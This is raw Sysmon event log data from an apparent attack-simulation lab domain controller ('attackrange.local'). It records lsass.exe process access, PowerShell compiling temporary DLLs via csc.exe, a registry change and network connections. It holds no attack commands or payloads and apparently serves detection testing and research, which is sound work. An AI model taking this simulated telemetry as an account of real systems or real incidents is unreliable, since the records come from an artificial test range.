l+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.435{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.388{266CAFBE-6439-6064-C802-00000000AD01}5052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.341{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.966{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 11:59:59.919{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 354300x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.557{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53834-false10.0.1.14win-dc-892.attackrange.local5986- 354300x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.740{266CAFBE-62ED-6064-2900-00000000AD01}2752C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63323- 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.669{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.669{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.654{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.622{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.cmdlineMD5=C13AD99B06D1669FCD66EC17EF9F641A,SHA256=6CAE6F438C1E4BC3EB53F49EA38DB6ADDE793C21B52DBDAB5BB4BB310B1D128C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.622{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.0.csMD5=054C0A1487614BA970CB949FA443FFFB,SHA256=6B88C7F565FF6B5879B03F6F3622B596B63D0C76E3EC5751390A446AF187E21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.outMD5=78F50BA7CAC8DB585A187A73637847F0,SHA256=94360BE94D17DE1A33371EEB4A2B7D5A63E74FFE18C96A620F5DF0C1D4C2B0CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.pdbMD5=32530055B2EA7505C4488FC3394F7D4A,SHA256=15A88F31ACDFDA7B9C8990A5721416444DFBA143266FCB9E28FEB12FCDAA68C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.607{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dllMD5=CA9E4CAF01DB2BD34BA847580164CA35,SHA256=4D67BCA19C07B8B61D2478BCF6C21BDDDAC573036EDB004C9BC37FA1DFEB7A87,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\CSC256FC59F54DB41CB8ECA1DDFF829C17D.TMPMD5=B58A3CC64B3C0E396953EB63FF5DE8B2,SHA256=78D5543669E698F3642869ED00EC628726F08DAB117387BD5749C725ED1466ED,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dll2021-03-31 11:59:59.497 23542300x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.607{266CAFBE-643F-6064-D302-00000000AD01}4040ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESCC40.tmpMD5=7B96C35C7DF7CB01F4D95EF969279139,SHA256=12528E1FD1EC8332B7FF97D54A86C31581E021FA9524A9176CE2F6DCAAF00DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-643F-6064-D402-00000000AD01}4416ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESCC40.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.591{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.591{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
